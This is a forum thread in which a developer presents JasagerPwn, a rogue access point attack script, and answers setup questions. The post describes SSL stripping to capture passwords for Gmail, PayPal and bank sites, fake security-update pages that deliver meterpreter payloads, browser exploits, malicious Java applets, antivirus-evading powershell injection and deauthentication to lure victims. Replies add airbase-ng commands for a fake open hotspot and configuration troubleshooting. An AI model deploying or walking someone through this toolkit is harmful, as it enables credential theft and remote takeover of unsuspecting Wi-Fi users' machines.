MK2: Jasagerpwn [script] [video]

[leg3nd]

JasagerPwn Version 1.4

Considering the MK3 has been released and the thread has been unpinned, I will not longer be checking this or providing support but will continue to keep the googlecode page updated.

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this script or its features.

Notes from developer:

• 
  
• Please leave your feedback regarding your experience while using this script (Good or bad), ideas for future development, improvements, and bugs. Feedback is what will keep me developing and spending my free time implementing new attacks for public use.
  
• The video is older and gives a basic idea of the script, but things such as the FakeUpdate attack vector are now OS agnostic, as well many others improvements.
  
• The googlecode page has been changed, Insure you have the most current version from the links below or else you will get errors and not receive updates. Thanks.
  

Script Download: JasagerPwn @ Infos3c (Right Click > Save As)

Google Code: http://code.google.com/p/jasagerpwn/

Video Download: http://blip.tv/file/get/Leg3ndary-JasagerPwnScript532.flv (Right Click > Save As)

Video Online: http://blip.tv/file/5143877

What does this do?

This is a bash script designed for BackTrack 4/5 or other Ubuntu based distributions. It utilizes the powerful Jasager firmware on a rogue access point, Allowing the attacker to seamlessly implement different attacks based on there current situation. These attacks use popular frameworks such as Metasploit, Social Engineering Toolkit, and SSL Strip. The intention of this script is to allow seamless utilization of all the attacks with ease, allowing your client-side attacks success rate and speed of the setups to sky rocket.

Included Features:

• SSL Strip: The powerful python implementation by none other then Moxie Marlinspike. This attack will strip out all SSL encryption from website such as Gmail, Paypal, Chase, and similar "secured" websites. While you are in the middle with your access point, you can see the passwords pass through your system in cleartext allowing you to gain full access to various accounts.
  
• FakeUpdate: This forces your WLAN clients via IPtables to a custom website setup I created using a main index.php which redirects the user based on the client OS detected. For example if they are on Microsoft Windows, they will be redirected to a Microsoft Security Update page with a download link to a meterpreter reverse_tcp payload. As of rev7, This has support for OSX/Linux via Java Applets, Much more viable now!
  
• BrowserPwn: This forces your WLAN clients via IPtables to a web server running the Metasploit BrowserAutopwn auxiliary module. The modules contains various browser based exploits which will be ran against your clients in hope for a meterpreter or shell payload to be ran. Works relatively well depending on the patch levels of your clients and the current exploits available at the time, ensure to use msfupdate or -U before.
  
• JavaPwn: This is an attack vector from the Social Engineering Toolkit, by ReL1k, It forces your WLAN clients via IPtables to either a Google or Java Required web template which will pop up a "Secure signed java applet". This applet will contain a corresponding payload for the client and is highly effective as most users do not realize the potential risk of java applets. Probably my personal favorite with the highest success rate.
  - This now utilizes a new powershell meterpreter injection technique straight into memory, bypassing all windows anti-viruses on Vista and Windows 7. As of v1.3 r53.
  
• DeAuthorization: This section contains multiple ways to deauthorize clients on other access points in hope that they will connect to yours. A kind of "reverse war driving" (-Darren Kitchen). In my opinion this should always be running when your out in the wild, it will pull in clients and up your success rate substantially.
  
  • Airdrop-ng: A rule-based deauth attack which is by far the most effective method of collecting clients. You can add custom ruled to the configuraion via
    the "script/network" settings section as needed. By default you should have yourself on here if you setup the variables correctly.
    
  • Mass DeAuth: A basic implementation of 'airplay-ng -0 -D' built into a bash script I wrote. Somewhat effective if you cannot use airdrop-ng.
    
  • Single DeAuth: Pretty self descriptive, allows you to check out the clients and set up attacks to grab them specifically. Useful in some situations.
    

  [*]Script/Network Settings: Some basic settings for the script and your network which can be changed "on the fly". Mostly stuff I found while useful while testing the script in different situations. These include editing your airdrop-ng deauth configuration, changing your gateway interface, and refreshing your internet connection (DHCP/DNS).

Compatibility:

This was created with intentions for Alfa AWUS036H, Backtrack 4/5, and a Jasager powered router. Although it will likely work with other wireless cards and other Ubuntu based distributions if setup correctly.

Known Issues:

• Extensive testing in lab environments can cause both the attacking and victim machine to run into connectivity issues. Reboots during testing can solve many issues on both sides.
  
• DHCP Issues with the Mark 3 - Currently looking for a fix.
  

ChangeLog:

Revision 3: Reset revision numbers with new googlecode page.

Revision 5: Fixed update functions for new googlecode links.

Revision 6: Added MUCH more stable dependency installations.

Revision 7: Redesigned FakeUpdate with java applet for OSX/Linux.

Revision 8: Added "Java Repeater" functionality to FakeUpdate OSX/Linux.

Revision 19: Lots of minor stability changes. Updates to go with new versions of SET.

Revision 26: Removed SET all together. Java attacks are now implemented by jasagerPwn.

Revision 30: Removed DNSspoof and used metasploit fakeDNS instead for stability. Other major changes.

Revision 51: Added ability to set gateway static, other basic changes.

Revision 53: Added new powershell payload deployment, No more anti-virus issues.. EVER!

Revision 63: Added obfuscation of normal windows payloads. Streamlined code and added NGREP script.

Edited January 5, 2012 by leg3nd

[Sebkinne]

Thank you for posting this again!

I will give it a shot and let you know how it went!

Best,

Seb

[RWING]

I think I have a copy of the video if you want me to upload it somewhere. I attached a screenshot of the beginning of the video I have so you can see if it's what you're looking for!

[digininja]

Please give leg3nd some support on this with your feedback and comments.

[leg3nd]

Thanks for the quick reply's and support, its appreciated. I have the video uploaded and made fixed a few bugs, I will be updating the main post with the correct information shortly.

UPDATE:

I have had a few major bugs personally reported to me regarding the usage of this in BackTrack 5 and possibly other distros. Make sure to update your script before trying it out via googlecode or the -U/-u switches. Good luck to all, please report all other bugs to me.

Edited May 24, 2011 by leg3nd

[leg3nd]

Bump. :(

[Darren Kitchen]

This is fantastic. Thanks! Pinned :)

[leg3nd]

Awesome!

I am also pleased to announce that I have made some major changes to the FakeUpdate attack vector, now *nix and OSX victims will receive a Java Applet much like the SET vector which will allow for a much more effective vector in terms of Mac / Linux.

I will be releasing this later on tonight or tomorrow most likely along with some other minor changes.

Edited May 26, 2011 by leg3nd

[JohnE]

Btw, you know that you can mimic the behavior of the jasagner by using the airbase-ng package available in the aircrack-ng suit.

just remember that your wireless access card MUST be supported by aircrack-ng

example:

#make sure the wifi interface is up and running:

sudo ifconfig wlan0 up

#create a monitor interface

sudo airmon-ng start wlan0 #(this will create mon0)

#start airbase-ng this will create network device: at0

airbase-ng -i mon0 -c 6 -P -C 30 -e "FreeeWiifiii" -v mon0 #Tweak this if necessarily (man airbase-ng)

#you could also specify a different listening device, if you have multiple wireless network adapters. (-i monX option), otherwise it will be limited to channel 6 (-c X option)

#configure at0

ifconfig at0 up

ifconfig at0 10.0.0.1 netmask 255.255.255.0

#start a dhcp server and dns server ,or something.. :)

dnsmasq -c /etc/dnsmasq.my.config

# the rest is up to your imagination. :) I'm currently working on a package that have allot of the same features than this one, only it's designed to be more "stealthy".

# have some phun. :)

###### the end

Btw guy's, this is actually a bigger threat than you might imagine. if found out that when i parked outside our office building after hours, multiple laptops associated with my computer.

lot of them unpatched windows xp laptops from other companies. Imagine how fast i could attack the local network if I where a blackhat. Instead I alerted them immediately. (and they of course only took it in consideration.)

lot of factory installed HP laptops will try to associate with "hpsetup".

If you're an IT-admin make sure that you patch users laptops, and if you can, invest in a WIPS. :)

[leg3nd]

Actually yes, The original concept of this script was based on airbase-ng, But I converted it over to Jasager because airbase-ng uses different methodology to implement jasager, allowing only a couple clients at a time with glitchy and unreliable results.

After getting a pineapple I experienced MUCH more reliable results, as well as the ability to maintain 20+ clients at once. Airebase-ng can get the job done for research, but I recommend a real Jasager router for professional work and audits.

EDIT: Edited for accuracy from digininja's information.

Edited December 3, 2011 by leg3nd

[Nu773r]

Hi,

Probably bit of a noob question but here goes...

Currently have a Pineapple configured so i can use it happily within a Windows XP Environment utilizing ICS etc etc if i want to switch to BT5 and use this amazing looking script are there any configuration changes needed on the Pineapple i need to make prior to using this script i.e. DHCP/SSID etc etc.

Thanks

[digininja]

the reason Jasager works better than airbase for multiple clients is that Jasager uses real AP mode so all traffic is handled by dedicated kernel level code. Airbase fakes it all by using monitor mode with packet injection and does the processing in user space.

[Smoogle]

first, i just want to say that i love the script. I was wondering if you can add upside-down turnet to the script?

[digininja]

I wouldn't have thought there was enough CPU power to do it in a usable way on the Fon.

[leg3nd]

the reason Jasager works better than airbase for multiple clients is that Jasager uses real AP mode so all traffic is handled by dedicated kernel level code. Airbase fakes it all by using monitor mode with packet injection and does the processing in user space.

Ah okay that makes sense. I was never able to figure out what was causing it, but it was pretty blatant that a real router was needed over the soft AP. Thanks for the clarification.

Currently have a Pineapple configured so i can use it happily within a Windows XP Environment utilizing ICS etc etc if i want to switch to BT5 and use this amazing looking script are there any configuration changes needed on the Pineapple i need to make prior to using this script i.e. DHCP/SSID etc etc.

There is a "Wiki/Installation" page on the googlecode website that explains the setup, as well as a text file with similar information that comes with the script. You just have to setup your subnets and disable dnsmaq(DHCP server) on your FON, the script handles the rest pretty much.

Edited June 8, 2011 by leg3nd

[Nu773r]

Thanks for the heads up will take a look and have a play.

[gaud]

Currently playing with this, working from the howtoinstall.

I was unable to get twisted-web

I'm also having problems with

cd /pentest/exploits/set/ && python install.py cd /pentest/wireless/airdrop-ng/ && python install.py 

I'm getting "python: can't open file 'install.py': [Errno 2] no such file or directory" are you sure you don't mean setup.py?

It looks like everything was already installed in BT5.

[leg3nd]

Currently playing with this, working from the howtoinstall.

I was unable to get twisted-web

I'm also having problems with

cd /pentest/exploits/set/ && python install.py cd /pentest/wireless/airdrop-ng/ && python install.py 

I'm getting "python: can't open file 'install.py': [Errno 2] no such file or directory" are you sure you don't mean setup.py?

It looks like everything was already installed in BT5.

Yeah sorry I think it changed since bt4 and I did not notice. The correct method should be something along these lines

Twisted web (Iv only gotten this to work on 32 bit):

apt-get update && apt-get -y install python-twisted-bin python-twisted-core python-twisted-web python-twisted-web2

Install SET and airdrop-ng(I think airdrop-ng is scripted to be installed regardless.):

cd /pentest/exploits/set/ && chmod +x setup.py && python setup.py && cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && chmod +x install.py && python install.py

I updated the wiki and installHowTo files. They may already be installed in BT5, at least some of them, but I'm not sure. The script should install most of it during the dependency checks as well, still probably better off being safe and just installing it manually because I may have forgotten something.

Edited June 15, 2011 by leg3nd

[BGPv5]

@digininga & Leg3nd - This script is awesome work. Thank you for putting the time into this and sharing!!!

[BLACK HAWK409]

hello everyone I have a problem with this script. can not get it to work, need help to configure the script according to my network settings

Gateway IP = 192.168.0.1

Subnet = 255.255.255.0

The Pineapple coms pre configured with 192.168.1.1 Will it work on my network? if not what should I do? any tips?

if you need more info please ask me.

[leg3nd]

You will need to configure both the pineapple and the variables/settings in the top of the script to reflect your network settings.

The default configuration for jasagerPwn uses the 192.168.10.0/24 subnet.

[BLACK HAWK409]

Thanks for the reply. My Settings looks like this, and when i try to connect to openwrt i dont get ip

subnet 192.168.0.0 netmask 255.255.255.0 {

interface $FONIFACE;

range 192.168.0.3 192.168.0.254;

option routers 192.168.0.1; <= is this my home router or the pineapple?

option subnet-mask 255.255.255.0;

option broadcast-address 192.168.0.255;

option domain-name-servers $fonIP;

option domain-name \"$DomainName\";

and my pineapple settings like this (/etc/config/network)

config interface loopback

option ifname lo

option proto static

option ipaddr 127.0.0.1

option netmask 255.0.0.0

config interface lan

option ifname eth0

option type bridge

option proto static

option ipaddr 192.168.0.4

option netmask 255.255.255.0

[leg3nd]

option routers 192.168.0.1; <= is this my home router or the pineapple?

That is the IP address of your attacking computer which is facing the pineapple via ethernet. It should also be the same IP represented in the $fonIP variable.

For the setup it appears your trying to use the topology would be something like:

• Pineapple: No DHCP(dnsmasq) running, 192.168.0.1
  
• fonIP Variable (Attacker computer): 192.168.0.2
  

I will update the script to use that fonIP variable in that configuration instead and update the comments to be a little easier to understand.

[BLACK HAWK409]

Hi leg3nd!

Now I only have one problem, that I know:

I get the ip address and I can see DNS requests via wireshark. but then nothing happens ... what am I missing?

[leg3nd]

You need to be much more specific with your issues for me to troubleshoot it.

At which point are the requests failing? For example, in the java attack, the fake update attack, or in normal internet connectivity.

Please use pastebin or use code tags and post the top of the script (the confiruation) as well as a description of your network topology your trying to use with it.

General DNS troubleshooting...

• While the script is running run "cat /etc/resolv.conf" and insure it outputs "nameserver 4.2.2.2".
  
• Ensure your have dnsmasq disabled on the fon, ssh into it and run: /etc/init.d/dnsmasq stop && /etc/init.d/dnsmasq disable
  
• Ensure you have the interfaces in the script configured correctly to forward your internet connection. WIFACE, should be the wireless card used for attacking and de-authorization, such as an alfa. FONIFACE, should be the ethernet interface that is connected to the pineapple/fon. IFACE, should be the interface that you are sharing the connection from which can be from a phone or a wireless AP.